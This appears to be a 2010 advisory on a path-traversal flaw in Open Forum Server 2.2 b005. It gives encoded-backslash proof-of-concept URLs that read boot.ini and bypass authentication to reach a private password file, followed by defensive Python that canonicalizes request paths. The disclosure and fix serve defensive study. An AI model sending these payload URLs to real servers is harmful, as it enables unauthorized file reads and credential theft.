It's possible to navigate the local file system of a server running Open Forum Server 2.2 b005 by using a specially crafted URL.
Exploit:
%2F../
%5C../
%5C
PoC:
http://localhost/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini
http://localhost/Admin/Users/Admin/private%5Cpassword.txt
Note: the percent-encoded backslash in the second URL bypasses authentication. However, the response is malformed, so a debugging proxy may be necessary to view it.
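On the defensive side, both PoC URLs stop working once the request path is canonicalized before any file or access decision is made. The following is an added example, not code from Open Forum Server or from the original post; the protected prefix, the function names and the raw-string check shown for contrast are assumptions, since the server's actual logic is not shown here.

```python
from urllib.parse import unquote

# Assumption: hypothetical protected area, taken from the second PoC URL's path.
PROTECTED_PREFIX = ("admin", "users", "admin", "private")

def canonical_segments(raw_path):
    """Return normalized path segments, or None if the path must be rejected."""
    decoded = raw_path
    for _ in range(4):              # decode repeatedly: %255C -> %5C -> backslash
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    else:
        return None                 # still changing after 4 rounds
    if "\x00" in decoded:
        return None
    segments = []
    # Backslash is a path separator on Windows, so treat it like "/".
    for part in decoded.replace("\\", "/").split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            return None             # refuse traversal instead of resolving it
        segments.append(part.lower())   # Windows file names are case-insensitive
    return tuple(segments)

def naive_is_protected(raw_path):
    """Raw-string prefix test, shown only for contrast (hypothetical)."""
    return raw_path.startswith("/Admin/Users/Admin/private/")

def decide(raw_path):
    """Classify a request path as 'reject', 'auth-required' or 'public'."""
    segments = canonical_segments(raw_path)
    if segments is None:
        return "reject"
    if segments[:len(PROTECTED_PREFIX)] == PROTECTED_PREFIX:
        return "auth-required"
    return "public"

if __name__ == "__main__":
    # Paths from the two PoC URLs above, plus two constructed ones.
    for path in ("/%5C../%5C../%5C../%5C../%5C../%5C../%5C../boot.ini",
                 "/Admin/Users/Admin/private%5Cpassword.txt",
                 "/Admin/Users/Admin/private%255Cpassword.txt",
                 "/index.html"):
        print(decide(path), naive_is_protected(path), path)
```

The raw-string test returns `False` for the second PoC path because `%5C` is not `/`, while the canonical form places the same request inside the protected directory.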
Saturday, May 15, 2010